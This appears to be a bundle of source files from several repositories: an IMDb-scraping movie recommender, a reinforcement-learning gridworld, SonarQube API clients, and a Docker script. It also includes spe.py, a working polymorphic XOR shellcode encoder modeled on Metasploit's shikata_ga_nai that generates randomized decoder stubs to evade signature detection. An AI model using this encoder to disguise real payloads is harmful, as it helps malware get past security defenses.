def filter_keywords(x):
words = []
for i in x:
if i in s:
words.append(i)
return words
smd['keywords'] = smd['keywords'].apply(filter_keywords)
smd['keywords'] = smd['keywords'].apply(lambda x: [stemmer.stem(i) for i in x])
smd['keywords'] = smd['keywords'].apply(lambda x: [str.lower(i.replace(" ", "")) for i in x])
smd['soup'] = smd['keywords'] + smd['cast'] + smd['director'] + smd['genres'] + smd['popularity'] # + smd['year']
smd['soup'] = smd['soup'].apply(lambda x: ' '.join(x))
count = CountVectorizer(analyzer='word', ngram_range=(1, 2), min_df=0, stop_words='english')
count_matrix = count.fit_transform(smd['soup'])
cosine_sim = cosine_similarity(count_matrix, count_matrix)
smd = smd.reset_index()
titles = smd['title']
indices = pd.Series(smd.index, index=smd['title'])
inverse_indices = pd.Series(smd['title'], index=smd.index)
def convert_int(x):
try:
return int(x)
except:
return np.nan
id_map = pd.read_csv(path_dest + 'links.csv')[['movieId', 'tmdbId']]
id_map['tmdbId'] = id_map['tmdbId'].apply(convert_int)
id_map.columns = ['movieId', 'id']
id_map = id_map.merge(smd[['title', 'id']], on='id').set_index('title')
indices_map = id_map.set_index('id')
indices_map_for_tmdb = id_map.set_index('movieId')
global global_md, global_links, global_credits, global_keywords, global_cosine_sim, global_inverse_indices, global_indices_map, global_indices_map_for_tmdb, global_smd
global_md = copy.deepcopy(md)
links = pd.read_csv(path_dest + 'links.csv')
global_links = copy.deepcopy(links)
global_credits = copy.deepcopy(credits)
global_keywords = copy.deepcopy(keywords)
global_cosine_sim = copy.deepcopy(cosine_sim)
global_inverse_indices = copy.deepcopy(inverse_indices)
global_indices_map = copy.deepcopy(indices_map)
global_indices_map_for_tmdb = copy.deepcopy(indices_map_for_tmdb)
global_smd = copy.deepcopy(smd)
def get_recent_movies():
while True:
global final_list_recent_movies
final_list_recent_movies = []
# if False:
# from shutil import copyfile
# copyfile(path_src + 'pop_new_metadata.csv', path_dest + 'metadata.csv')
# copyfile(path_src + 'pop_new_links.csv', path_dest + 'links.csv')
# copyfile(path_src + 'credits.csv', path_dest + 'credits.csv')
# copyfile(path_src + 'keywords.csv', path_dest + 'keywords.csv')
now = datetime.datetime.now()
year = now.year
month = now.month
if month - 2 < 1:
month = 12 - (month - 2)
year -= 1
else:
month -= 2
data_finish = str(now.year)+"-"+str(now.month).zfill(2)+"-30" # 2017-01-01
data_start = str(year)+"-"+str(month).zfill(2)+"-1"
url = "https://www.imdb.com/search/title?release_date=" + str(data_start) + "," + str(data_finish) + "&languages=en&sort=num_votes,desc&page="
for number_page in range(1, 4):
print("PAGE: " + str(number_page))
url_num = url + str(number_page)
req = requests.get(url_num)
data = req.text
data = ''.join([i if ord(i) < 128 else '~' for i in data])
soup = BeautifulSoup(data,"html.parser")
for movie in soup.findAll('div', {'class':'lister-item mode-advanced'}):
imdb_rate = float(movie.find('div', {'class':'inline-block ratings-imdb-rating'}).get('data-value'))
metascore = movie.find('div', {'class':'inline-block ratings-metascore'})
if not metascore:
continue
metascore = int(str(metascore.text[:3]))
if float(metascore/10) + imdb_rate < 12.0:
continue
a = movie.find('div', {'class':"lister-item-content"}).find('h3',{'class':"lister-item-header"}).find('a')
imdb_link = "https://www.imdb.com" + '/'.join(str(a.get('href')).split('/')[:-1])
italian_title = a.text
year = movie.find('div', {'class':"lister-item-content"}).find('h3',{'class':"lister-item-header"}).find('span', {'class':'lister-item-year text-muted unbold'}).text
year = str(year)[1:5]
req_info = requests.get(imdb_link + "/releaseinfo")
data_info = req_info.text
data_info = ''.join([i if ord(i) < 128 else '~' for i in data_info])
soup_info = BeautifulSoup(data_info,"html.parser")
names = soup_info.find('table', {'class':'subpage_data spEven2Col', 'id':'akas'})
if not names:
continue
original_name = str(italian_title)
names = names.text.split('\n\n')
name_found = False
for n in names:
if len(n.split('\n')) != 2:
continue
state, name = n.split('\n')
if state == "UK" or state == "USA":
name_found = True
original_name = name
break
if not name_found:
for n in names:
if len(n.split('\n')) != 2:
continue
state, name = n.split('\n')
if state == "(original title)":
original_name = name
break
if '~' in str(original_name):
continue
release_date_italy = soup_info.find('table', {'class':'subpage_data spFirst', 'id':'release_dates'})
release_date_found = None
for n in release_date_italy.text.split('\n\n'):
if len(n.split('\n')) != 2:
continue
state, release_date = n.split('\n')
if state == "Italy":
release_date_found = release_date
break
available = True
if release_date_found:
now = datetime.datetime.now()
release_date_found_days, release_date_found_month, release_date_found_year = release_date_found.split(' ')
if int(release_date_found_year) > int(now.year):
available = False
for month_idx in range(1, 13):
if str(calendar.month_name[month_idx]) == release_date_found_month:
if int(month_idx) > int(now.month):
available = False
break
if int(month_idx) == int(now.month) and int(release_date_found_days) > int(now.day):
available = False
break
md = pd.read_csv(path_dest + 'metadata.csv')
title_already_done = md['title'].values
if str(original_name) in title_already_done and original_name != None:
if available:
final_list_recent_movies.append([str(original_name), ""])
else:
ry, rm, ra = release_date_found.split(' ')
final_list_recent_movies.append([str(original_name), ' '.join([ry, rm[:3], ra])])
print(original_name + " already done")
continue
title_found = get_tmdb_info(original_name, year)
if title_found != None:
if available:
final_list_recent_movies.append([str(original_name), ""])
else:
ry, rm, ra = release_date_found.split(' ')
final_list_recent_movies.append([str(original_name), ' '.join([ry, rm[:3], ra])])
load_everything()
print("ready")
time.sleep(int(np.random.randint(172800)+300))
from threading import Thread
Thread(target=get_recent_movies).start()
def get_all_cinema_movies():
return final_list_recent_movies
def final_cinema_movies(userId):
global final_list_recent_movies
global global_cosine_sim, global_inverse_indices, global_indices_map, global_indices_map_for_tmdb, global_smd
ratings = pd.read_csv(path_src + 'pop_new_ratings.csv')
del ratings['useless']
from hybrid import get_svd
svd = get_svd()
print("cinema for " + str(userId))
def hybrid_recommandation(userId, title, svd):
idx = 0
for i, t in enumerate(global_inverse_indices.values):
if t == title:
idx = i
break
sim_scores = list(enumerate(global_cosine_sim[int(idx)]))
sim_scores = sorted(sim_scores, key=lambda x: x[1], reverse=True)
sim_scores = sim_scores[1:10]
movie_indices = [i[0] for i in sim_scores]
movies = global_smd.iloc[movie_indices][['title','id']]
def pred(x):
try:
return svd.predict(userId, global_indices_map.loc[x]['movieId']).est
except:
return 0
movies['recommanded'] = movies['id'].apply(pred)
movies = movies.sort_values('recommanded', ascending=False)
total_predict = 0
for i in movies['recommanded'].values:
total_predict += float(i)
return total_predict
dict_rank_movies = {}
for m, available in final_list_recent_movies:
total_predict = hybrid_recommandation(userId, m, svd)
if available == "":
dict_rank_movies[str(m)] = total_predict
else:
dict_rank_movies[str(m) + " [" + str(available) + "]"] = total_predict
best_movie_sorted = sorted(dict_rank_movies.items(), key=lambda x: x[1], reverse=True)
element_to_take = []
count_not_exit_yet = 0
count_exit_yet = 0
for i, (title, predict) in enumerate(best_movie_sorted):
if count_exit_yet >= 2:
break
if ("2018]" in str(title) or "2019]" in str(title)) and count_not_exit_yet < 3:
count_not_exit_yet += 1
element_to_take.append((title, predict))
elif "2018]" not in str(title) and "2019]" not in str(title):
count_exit_yet += 1
element_to_take.append((title, predict))
try:
print(element_to_take)
except:
pass
return element_to_take
``` |
{
"source": "0x5eba/RL-Gridmap",
"score": 3
} |
#### File: RL-Gridmap/DRQN/gridmap.py
```python
import pygame
import time
import numpy as np
import scipy.misc
import copy
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
GREEN = (0, 255, 0)
RED = (255, 0, 0)
BLUE = (0, 0, 255)
class gameOb():
def __init__(self, coordinates, reward, name, color):
self.x = coordinates[0]
self.y = coordinates[1]
self.reward = reward
self.name = name
self.color = color
class Map:
def __init__(self, rows):
self.orginal_row = rows
self.rows = rows
self.size_margin = 5
self.size_square = 30
self.window_size, self.screen = self.set_window()
self.actions = 8
self.objects = []
def set_window(self):
win_size = self.size_square * self.rows + (self.size_margin * (self.rows + 1))
screen = pygame.display.set_mode((win_size, win_size))
return win_size, screen
def reset(self):
self.rows = copy.deepcopy(self.orginal_row)
self.window_size, self.screen = self.set_window()
self.objects = []
hero = gameOb(self.newPosition(), None, 'hero', BLUE)
self.objects.append(hero)
for _ in range(2):
goal = gameOb(self.newPosition(), 3, 'goal', GREEN)
self.objects.append(goal)
for _ in range(5):
holes = gameOb(self.newPosition(), -1, 'fire', RED)
self.objects.append(holes)
return self.renderEnv()
def newPosition(self):
points = []
for row in range(1, self.rows+1):
for column in range(1, self.rows+1):
points.append((self.size_margin * row + self.size_square * (row - 1),
self.size_margin * column + self.size_square * (column - 1)))
currentPositions = []
for objectA in self.objects:
if (objectA.x, objectA.y) not in currentPositions:
currentPositions.append((objectA.x, objectA.y))
for pos in currentPositions:
points.remove(pos)
location = np.random.choice(range(len(points)), replace=False)
return points[location]
def renderEnv(self):
self.screen.fill(BLACK)
for row in range(self.rows):
for column in range(self.rows):
pygame.draw.rect(self.screen, WHITE,
[(self.size_margin + self.size_square) * column + self.size_margin,
(self.size_margin + self.size_square) * row + self.size_margin,
self.size_square, self.size_square])
for block in self.objects:
if block.name == 'hero':
pygame.draw.rect(self.screen, block.color, pygame.Rect(
block.x, block.y, self.size_square, self.size_square))
else:
pygame.draw.rect(self.screen, block.color, pygame.Rect(
block.x, block.y, self.size_square, self.size_square))
pygame.surfarray.array3d(pygame.display.get_surface())
pygame.display.flip()
imgdata = pygame.surfarray.array3d(self.screen)
# imgdata.swapaxes(0,1)
b = scipy.misc.imresize(
imgdata[:, :, 0], [84, 84, 1], interp='nearest')
c = scipy.misc.imresize(
imgdata[:, :, 1], [84, 84, 1], interp='nearest')
d = scipy.misc.imresize(
imgdata[:, :, 2], [84, 84, 1], interp='nearest')
img = np.stack([b, c, d], axis=2)
return img
def updateStart(self, x, y):
hero = None
for block in self.objects:
if block.name == 'hero':
hero = block
break
hero.x += x
hero.y += y
score = 0
if hero.x >= self.window_size or hero.y >= self.window_size or hero.x <= 0 or hero.y <= 0:
score = -1
if score != 0:
hero.x -= x
hero.y -= y
for i in range(len(self.objects)):
if self.objects[i].name == 'hero':
self.objects[i] = hero
break
return score
def checkGoal(self):
hero = None
for block in self.objects:
if block.name == 'hero':
hero = block
break
for other in self.objects:
if other.name != 'hero' and hero.x == other.x and hero.y == other.y:
# self.objects.remove(other)
# if other.name == 'goal':
# self.objects.append(gameOb(self.newPosition(), 3, 'goal', GREEN))
# # self.objects.append(gameOb(self.newPosition(), 1, 'goal', GREEN))
# # n = int(len([i for i in self.objects if i.reward == -1])*0.2)
# # n = 1 if n < 1 else n
# # self.rows += int(1/n)
# # self.window_size, self.screen = self.set_window()
# # self.objects.extend([gameOb(self.newPosition(), -1, 'fire', RED) for i in range(n)])
# else:
# self.objects.append(gameOb(self.newPosition(), -1, 'fire', RED))
return other.reward
return -0.1 # penality of a move
def move(self, action):
pygame.event.pump()
if (action == 0): # up
score = self.updateStart(0, -self.size_margin - self.size_square)
elif (action == 1): # right
score = self.updateStart(self.size_margin + self.size_square, 0)
elif (action == 2): # down
score = self.updateStart(0, self.size_margin + self.size_square)
elif (action == 3): # left
score = self.updateStart(-self.size_margin - self.size_square, 0)
elif (action == 4): # up-right
score = self.updateStart(self.size_margin + self.size_square, -self.size_margin - self.size_square)
elif (action == 5): # right-down
score = self.updateStart(self.size_margin + self.size_square, self.size_margin + self.size_square)
elif (action == 6): # down-left
score = self.updateStart(-self.size_margin - self.size_square, self.size_margin + self.size_square)
elif (action == 7): # left-up
score = self.updateStart(-self.size_margin - self.size_square,-self.size_margin - self.size_square)
pygame.surfarray.array3d(pygame.display.get_surface())
pygame.display.flip()
return score
def step(self, action):
penalty = self.move(action)
reward = self.checkGoal()
state = self.renderEnv()
return state, (reward + penalty)
``` |
{
"source": "0x5FC3/spe.py",
"score": 2
} |
#### File: 0x5FC3/spe.py/spe.py
```python
from keystone import *
import random
REGISTERS = list()
# Registers with 8 bit parts
REGISTERS.append({32: "EAX", 16: "AH", 8: "AL"})
REGISTERS.append({32: "EBX", 16: "BH", 8: "BL"})
REGISTERS.append({32: "ECX", 16: "CX", 8: "CL"})
REGISTERS.append({32: "EDX", 16: "DX", 8: "DL"})
# Registers withoutu 8 bit parts
REGISTERS.append({32: "ESI", 16: "SI"})
REGISTERS.append({32: "EDI", 16: "DI"})
def read_payload(path):
"""Read file as bytes"""
with open(path, 'rb') as f:
return f.read()
def assemble(code):
"""Assemble instructions"""
ks = Ks(KS_ARCH_X86, KS_MODE_32)
encoding, count = ks.asm(code)
return bytes(encoding)
def get_random_fpu_instruction():
"""Returns a random FPU instruction.
Ported to python from metasploit's shikata_ga_nai.rb
"""
fpu_opcodes = list()
# D9E8 - D9 EE
for opcode in range(0xe8, 0xee+1):
fpu_opcodes.append(bytes([0xd9, opcode]))
# D9C0 - D9CF
for opcode in range(0xc0, 0xcf+1):
fpu_opcodes.append(bytes([0xd9, opcode]))
# DAC0 - DADF
for opcode in range(0xc0, 0xdf+1):
fpu_opcodes.append(bytes([0xda, opcode]))
# DBC0 - DBDF
for opcode in range(0xc0, 0xdf+1):
fpu_opcodes.append(bytes([0xdb, opcode]))
# DDC0 - DDC7
for opcode in range(0xc0, 0xc7+1):
fpu_opcodes.append(bytes([0xdd, opcode]))
fpu_opcodes.append(bytes([0xd9, 0xd0]))
fpu_opcodes.append(bytes([0xd9, 0xe1]))
fpu_opcodes.append(bytes([0xd9, 0xf6]))
fpu_opcodes.append(bytes([0xd9, 0xf7]))
fpu_opcodes.append(bytes([0xd9, 0xe5]))
return random.choice(fpu_opcodes)
def get_offset(limit=12):
"""Returns a random offset for the fnstenv location"""
return random.randrange(0, limit)
def format_payload(payload):
# readability out of the window
return ''.join([f'\\x{payload[i:i+2]}' for i in range(0, len(payload), 2)])
def generate_random_byte():
return random.randrange(0x01, 0xFF)
def get_random_register(size=32, exclude_regs=[]):
"""Returns a random register with a given size
excluding the registers in the exclude_regs list
"""
reg = random.choice(REGISTERS)
if (size in reg):
for reg_value in reg.values():
if reg_value in exclude_regs:
return get_random_register(size, exclude_regs)
return reg.get(size)
return get_random_register(size, exclude_regs)
def generate_pops(target_reg, exclude_regs=[], count=1, allow_dups=True):
"""Returns pop instructions ending with pop target_reg
excluding registers in the exclude_regs list
"""
random_regs = []
for _ in range(0, count-1):
random_reg = get_random_register(exclude_regs=exclude_regs)
random_regs.append(random_reg)
pops = ''
for reg in random_regs:
pops += f'pop {reg}; '
pops += f'pop {target_reg}; '
return pops
def generate_decoder_stub(payload_len, key):
"""Returns the decoder stuff which decodes the
encoded payload.
"""
# Calculate the offset of encoded payload
# from the retrieved PC.
# FPU instruction + fnstenv = 2 + 4 bytes
offset_to_encoded_payload = 6
# Offset for fnstenv to write on the stack
# a little more polymorphism
fnstenv_offset = get_offset()
# instructions for the getPC routine
get_pc_asm = ''
# size 4 bytes
get_pc_asm += f'fnstenv [esp-{hex(fnstenv_offset)}]; '
# reg to save program counter
pc_reg = get_random_register(exclude_regs=['ECX'])
# if offset is 4 bytes aligned, use pops
# instead of mov
if (fnstenv_offset % 4 == 0):
instructions_count = int((12 - fnstenv_offset)/4) + 1
# size 1 byte each
offset_to_encoded_payload += (instructions_count*1)
get_pc_asm += generate_pops(pc_reg,
exclude_regs=['ECX'],
count=instructions_count)
else:
# else use mov
# size 4 bytes
offset_to_encoded_payload += 4
get_pc_asm += f'mov {pc_reg}, [esp+{hex(12-fnstenv_offset)}]; '
# register to save the one byte xor key
xor_key_reg = get_random_register(size=8, exclude_regs=['CL', pc_reg])
# xor decode instructions
xor_asm = ''
# if payload size can fit in one byte, use CL
if (payload_len < 256):
# size 2 bytes
offset_to_encoded_payload += 2
xor_asm += f'mov CL, {hex(payload_len)}; '
else:
# else use CX
# size 4 bytes
offset_to_encoded_payload += 4
xor_asm += f'mov CX, {hex(payload_len)}; '
# size of the next 4 instructions
offset_to_encoded_payload += 8
# size 2 bytes
xor_asm += f'mov {xor_key_reg}, {hex(key)}; '
xor_asm += 'decode: '
# size 4 bytes
# offset-1 because starts from 0
xor_asm += f'xor [{pc_reg} + CL + {hex(offset_to_encoded_payload-1)}], {xor_key_reg}; '
# size 2 bytes
xor_asm += f'loop decode; '
# assemble and return
decoder_stub = b''
decoder_stub += get_random_fpu_instruction()
decoder_stub += assemble(get_pc_asm)
decoder_stub += assemble(xor_asm)
return decoder_stub
def encode_payload(payload, key):
"""Returns XOR encoded payload with the given key"""
encoded_payload = b''
for b in payload:
encoded_payload += bytes([b ^ key])
return encoded_payload
def encode(payload_path):
payload = read_payload(payload_path)
key = generate_random_byte()
encoded_payload = encode_payload(payload, key)
decoder_stub = generate_decoder_stub(len(payload), key)
return decoder_stub + encoded_payload
print(format_payload(encode('./payload').hex()))
``` |
{
"source": "0x646e78/python-sonarqube-api",
"score": 3
} |
#### File: sonarqube/cloud/users.py
```python
from sonarqube.utils.rest_client import RestClient
from sonarqube.utils.config import (
API_USERS_SEARCH_ENDPOINT,
API_USERS_GROUPS_ENDPOINT
)
class SonarCloudUsers(RestClient):
"""
SonarCloud users Operations
"""
MAX_SEARCH_NUM = 200
def __init__(self, **kwargs):
"""
:param kwargs:
"""
super(SonarCloudUsers, self).__init__(**kwargs)
def __getitem__(self, login):
result = list(self.search_users(q=login))
for user in result:
if user['login'] == login:
return user
def search_users(self, q=None):
"""
Get a list of active users.
:param q: Filter on login, name and email
:return:
"""
params = {}
page_num = 1
page_size = 1
total = 2
if q:
params.update({'q': q})
while page_num * page_size < total:
resp = self.get(API_USERS_SEARCH_ENDPOINT, params=params)
response = resp.json()
page_num = response['paging']['pageIndex']
page_size = response['paging']['pageSize']
total = response['paging']['total']
params['p'] = page_num + 1
for user in response['users']:
yield user
if page_num >= self.MAX_SEARCH_NUM:
break
def search_groups_user_belongs_to(self, login, organization, q=None, selected="selected"):
"""
Lists the groups a user belongs to.
:param login:
:param organization: organization key.
:param q: Limit search to group names that contain the supplied string.
:param selected: Depending on the value, show only selected items (selected=selected), deselected items
(selected=deselected), or all items with their selection status (selected=all).Possible values are for:
* all
* deselected
* selected
default value is selected.
:return:
"""
params = {
'login': login,
'organization': organization,
'selected': selected
}
if q:
params.update({'q': q})
page_num = 1
page_size = 1
total = 2
if q:
params.update({'q': q})
while page_num * page_size < total:
resp = self.get(API_USERS_GROUPS_ENDPOINT, params=params)
response = resp.json()
page_num = response['paging']['pageIndex']
page_size = response['paging']['pageSize']
total = response['paging']['total']
params['p'] = page_num + 1
for group in response['groups']:
yield group
```
#### File: sonarqube/community/measures.py
```python
from sonarqube.utils.rest_client import RestClient
from sonarqube.utils.config import (
API_MEASURES_COMPONENT_ENDPOINT,
API_MEASURES_COMPONENT_TREE_ENDPOINT,
API_MEASURES_SEARCH_HISTORY_ENDPOINT
)
class SonarQubeMeasures(RestClient):
"""
SonarQube measures Operations
"""
default_metric_keys = 'code_smells,bugs,vulnerabilities,new_bugs,new_vulnerabilities,\
new_code_smells,coverage,new_coverage'
OPTIONS_COMPONENT_TREE = ['branch', 'pullRequest', 'additionalFields', 'asc', 'metricKeys', 'metricPeriodSort',
'metricSort', 'metricSortFilter', 'ps', 'q', 'qualifiers', 's', 'strategy']
def __init__(self, **kwargs):
"""
:param kwargs:
"""
super(SonarQubeMeasures, self).__init__(**kwargs)
def get_component_with_specified_measures(self, component, branch=None, pull_request_id=None,
fields=None, metric_keys=None):
"""
Return component with specified measures.
:param component: Component key
:param branch: Branch key.
:param pull_request_id: Pull request id.
:param fields: Comma-separated list of additional fields that can be returned in the response.
Possible values are for: metrics,periods
:param metric_keys: Comma-separated list of metric keys. Possible values are for: ncloc,complexity,violations
:return:
"""
params = {
'metricKeys': metric_keys or self.default_metric_keys,
'component': component
}
if branch:
params.update({'branch': branch})
if pull_request_id:
params.update({'pullRequest': pull_request_id})
if fields:
params.update({'additionalFields': fields})
resp = self.get(API_MEASURES_COMPONENT_ENDPOINT, params=params)
return resp.json()
def get_component_tree_with_specified_measures(self, component_key, **kwargs):
"""
Navigate through components based on the chosen strategy with specified measures. The baseComponentId or
the component parameter must be provided.
:param component_key: Component key.
optional parameters:
* branch: Branch key.
* pullRequest: Pull request id.
* metricKeys: Comma-separated list of metric keys. Possible values are for: ncloc,complexity,violations
* additionalFields: Comma-separated list of additional fields that can be returned in the response.
Possible values are for: metrics,periods
* asc: Ascending sort, Possible values are for: true, false, yes, no. default value is true.
* metricPeriodSort: Sort measures by leak period or not ?. The 's' parameter must contain
the 'metricPeriod' value
* metricSort: Metric key to sort by. The 's' parameter must contain the 'metric' or 'metricPeriod' value.
It must be part of the 'metricKeys' parameter
* metricSortFilter: Filter components. Sort must be on a metric. Possible values are:
* all: return all components
* withMeasuresOnly: filter out components that do not have a measure on the sorted metric
default value is all.
* q: Limit search to:
* component names that contain the supplied string
* component keys that are exactly the same as the supplied string
* qualifiers:Comma-separated list of component qualifiers. Filter the results with
the specified qualifiers. Possible values are:
* BRC - Sub-projects
* DIR - Directories
* FIL - Files
* TRK - Projects
* UTS - Test Files
* s: Comma-separated list of sort fields,Possible values are for: name, path, qualifier, metric, metricPeriod.
and default value is name
* strategy: Strategy to search for base component descendants:
* children: return the children components of the base component. Grandchildren components are not returned
* all: return all the descendants components of the base component. Grandchildren are returned.
* leaves: return all the descendant components (files, in general) which don't have other children.
They are the leaves of the component tree.
default value is all.
:return:
"""
params = {
'component': component_key,
'metricKeys': self.default_metric_keys,
}
if kwargs:
self.api.copy_dict(params, kwargs, self.OPTIONS_COMPONENT_TREE)
page_num = 1
page_size = 1
total = 2
while page_num * page_size < total:
resp = self.get(API_MEASURES_COMPONENT_TREE_ENDPOINT, params=params)
response = resp.json()
page_num = response['paging']['pageIndex']
page_size = response['paging']['pageSize']
total = response['paging']['total']
params['p'] = page_num + 1
for component in response['components']:
yield component
def search_measures_history(self, component, branch=None, pull_request_id=None,
metrics=None, from_date=None, to_date=None):
"""
Search measures history of a component
:param component: Component key.
:param branch: Branch key.
:param pull_request_id: Pull request id.
:param metrics: Comma-separated list of metric keys.Possible values are for: ncloc,coverage,new_violations
:param from_date: Filter measures created after the given date (inclusive).
Either a date (server timezone) or datetime can be provided
:param to_date: Filter measures created before the given date (inclusive).
Either a date (server timezone) or datetime can be provided
:return:
"""
params = {
'metrics': metrics or self.default_metric_keys,
'component': component
}
if branch:
params.update({'branch': branch})
if pull_request_id:
params.update({'pullRequest': pull_request_id})
if from_date:
params.update({'from': from_date})
if to_date:
params.update({'to': to_date})
page_num = 1
page_size = 1
total = 2
while page_num * page_size < total:
resp = self.get(API_MEASURES_SEARCH_HISTORY_ENDPOINT, params=params)
response = resp.json()
page_num = response['paging']['pageIndex']
page_size = response['paging']['pageSize']
total = response['paging']['total']
params['p'] = page_num + 1
for measure in response['measures']:
yield measure
```
#### File: sonarqube/community/plugins.py
```python
from sonarqube.utils.rest_client import RestClient
from sonarqube.utils.config import (
API_PLUGINS_AVAILABLE_ENDPOINT,
API_PLUGINS_CANCEL_ALL_ENDPOINT,
API_PLUGINS_INSTALL_ENDPOINT,
API_PLUGINS_INSTALLED_ENDPOINT,
API_PLUGINS_PENDING_ENDPOINT,
API_PLUGINS_UNINSTALL_ENDPOINT,
API_PLUGINS_UPDATE_ENDPOINT,
API_PLUGINS_UPDATES_ENDPOINT
)
class SonarQubePlugins(RestClient):
"""
SonarQube plugins Operations
"""
def __init__(self, **kwargs):
"""
:param kwargs:
"""
super(SonarQubePlugins, self).__init__(**kwargs)
def get_available_plugins(self):
"""
Get the list of all the plugins available for installation on the SonarQube instance, sorted by plugin name.
Plugin information is retrieved from Update Center. Date and time at which Update Center was last refreshed is
provided in the response. Update status values are:
* COMPATIBLE: plugin is compatible with current SonarQube instance.
* INCOMPATIBLE: plugin is not compatible with current SonarQube instance.
* REQUIRES_SYSTEM_UPGRADE: plugin requires SonarQube to be upgraded before being installed.
* DEPS_REQUIRE_SYSTEM_UPGRADE: at least one plugin on which the plugin is dependent requires SonarQube to
be upgraded.
:return:
"""
resp = self.get(API_PLUGINS_AVAILABLE_ENDPOINT)
response = resp.json()
return response['plugins']
def cancel_operation_pending_plugins(self):
"""
Cancels any operation pending on any plugin (install, update or uninstall)
:return:
"""
self.post(API_PLUGINS_CANCEL_ALL_ENDPOINT)
def install_plugin(self, plugin_key):
"""
Installs the latest version of a plugin specified by its key.
Plugin information is retrieved from Update Center.
:param plugin_key: The key identifying the plugin to install
:return:
"""
params = {
'key': plugin_key
}
self.post(API_PLUGINS_INSTALL_ENDPOINT, params=params)
def get_installed_plugins(self, fields=None):
"""
Get the list of all the plugins installed on the SonarQube instance, sorted by plugin name.
:param fields: Comma-separated list of the additional fields to be returned in response.
No additional field is returned by default. Possible values are:
* category - category as defined in the Update Center. A connection to the Update Center is needed
:return:
"""
params = {}
if fields:
params.update({'f': fields})
resp = self.get(API_PLUGINS_INSTALLED_ENDPOINT, params=params)
response = resp.json()
return response['plugins']
def get_pending_plugins(self):
"""
Get the list of plugins which will either be installed or removed at the next startup of the SonarQube instance,
sorted by plugin name.
:return:
"""
resp = self.get(API_PLUGINS_PENDING_ENDPOINT)
return resp.json()
def uninstall_plugin(self, plugin_key):
"""
Uninstalls the plugin specified by its key.
:param plugin_key: The key identifying the plugin to uninstall
:return:
"""
params = {
'key': plugin_key
}
self.post(API_PLUGINS_UNINSTALL_ENDPOINT, params=params)
def update_plugin(self, plugin_key):
"""
Updates a plugin specified by its key to the latest version compatible with the SonarQube instance.
Plugin information is retrieved from Update Center.
:param plugin_key: The key identifying the plugin to update
:return:
"""
params = {
'key': plugin_key
}
self.post(API_PLUGINS_UPDATE_ENDPOINT, params=params)
def get_available_update_plugins(self):
"""
Lists plugins installed on the SonarQube instance for which at least one newer version is available,
sorted by plugin name. Each newer version is listed, ordered from the oldest to the newest,
with its own update/compatibility status.Plugin information is retrieved from Update Center.
Date and time at which Update Center was last refreshed is provided in the response.
Update status values are: [COMPATIBLE, INCOMPATIBLE, REQUIRES_UPGRADE, DEPS_REQUIRE_UPGRADE].
:return:
"""
resp = self.get(API_PLUGINS_UPDATES_ENDPOINT)
return resp.json()
```
#### File: sonarqube/community/project_branches.py
```python
from sonarqube.utils.rest_client import RestClient
from sonarqube.utils.config import (
API_PROJECT_BRANCHES_LIST_ENDPOINT,
API_PROJECT_BRANCHES_DELETE_ENDPOINT,
API_PROJECT_BRANCHES_RENAME_ENDPOINT
)
class SonarQubeProjectBranches(RestClient):
"""
SonarQube project branches Operations
"""
def __init__(self, **kwargs):
"""
:param kwargs:
"""
super(SonarQubeProjectBranches, self).__init__(**kwargs)
def search_project_branches(self, project):
"""
List the branches of a project.
:param project: Project key
:return:
"""
params = {
'project': project
}
resp = self.get(API_PROJECT_BRANCHES_LIST_ENDPOINT, params=params)
response = resp.json()
return response['branches']
def delete_project_branch(self, project, branch):
"""
Delete a non-main branch of a project.
:param project: Project key
:param branch: Name of the branch
:return:
"""
params = {
'project': project,
'branch': branch
}
self.post(API_PROJECT_BRANCHES_DELETE_ENDPOINT, params=params)
def rename_project_branch(self, project, name):
"""
Rename the main branch of a project
:param project: Project key
:param name: New name of the main branch
:return:
"""
params = {
'project': project,
'name': name
}
self.post(API_PROJECT_BRANCHES_RENAME_ENDPOINT, params=params)
```
#### File: sonarqube/community/webservices.py
```python
from sonarqube.utils.rest_client import RestClient
from sonarqube.utils.config import (
API_WEBSERVICES_LIST_ENDPOINT,
API_WEBSERVICES_RESPONSE_EXAMPLE_ENDPOINT
)
class SonarQubeWebservices(RestClient):
"""
SonarQube webservices Operations
"""
def __init__(self, **kwargs):
"""
:param kwargs:
"""
super(SonarQubeWebservices, self).__init__(**kwargs)
def list_web_services(self, include_internals=False):
"""
List web services
:param include_internals: Include web services that are implemented for internal use only.
Their forward-compatibility is not assured. Possible values are for: True or False. default value is False.
:return:
"""
params = {
'include_internals': include_internals and 'true' or 'false'
}
resp = self.get(API_WEBSERVICES_LIST_ENDPOINT, params=params)
response = resp.json()
return response['webServices']
def web_service_response_example(self, action, controller):
"""
Display web service response example
:param action: Action of the web service
:param controller: Controller of the web service
:return:
"""
params = {
'action': action,
'controller': controller
}
return self.post(API_WEBSERVICES_RESPONSE_EXAMPLE_ENDPOINT, params=params)
``` |
{
"source": "0x646e78/sonarq",
"score": 2
} |
#### File: sonarq/sonarq/sonarq.py
```python
import argparse
import docker
import json
import os
import time
from datetime import datetime
from datetime import timezone
from sonarqube import SonarQubeClient
scanner_image='sonarsource/sonar-scanner-cli'
scanner_tag='latest'
server_image='sonarqube'
server_tag='lts'
server_name='sonar-server'
server_user='admin'
server_pass='<PASSWORD>' #Please don't bug me about this yet :P
docker_network='sonarq'
#TODO: logger
#TODO: __main__
class Infra():
def __init__(self):
self.client = docker.from_env()
def check_network(self):
try:
self.client.networks.get(docker_network)
except docker.errors.NotFound:
print(f'Creating docker network "{docker_network}" for SonarQube')
self.client.networks.create(docker_network)
def run_server(self):
try:
print('Launching a new SonarQube server')
container = self.client.containers.run(f'{server_image}:{server_tag}',
name=server_name,
network=docker_network,
ports={'9000/tcp': (host_ip, host_port)},
detach=True)
except Exception as e:
print(e)
exit(1)
return container
def run_scan(self, code_path, project_name, token):
try:
print(f'Starting a SonarQube scan of {project_name}. This could take a while depending on project size')
container = self.client.containers.run(f'{scanner_image}:{scanner_tag}',
f'-Dsonar.projectKey={project_name} -Dsonar.login={token} -Dsonar.working.directory=/tmp',
environment={'SONAR_HOST_URL': f'http://{server_name}:{host_port}'},
name='sonar-scanner',
network=docker_network,
volumes={code_path: {'bind': '/usr/src', 'mode': 'ro'}},
remove=True)
except Exception as e:
#TODO clean up container
print(e)
exit(1)
def server_status(self):
try:
return self.client.containers.get(server_name).status
except docker.errors.NotFound:
return False
def start_server(self):
print('Starting SonarQube server')
return self.client.containers.get(server_name).start()
def pull(self):
print('Updating docker images, this could take a while')
self.client.images.pull(server_image, tag=server_tag)
print('Server image pulled')
self.client.images.pull(scanner_image, tag=scanner_tag)
print('Scanner image pulled')
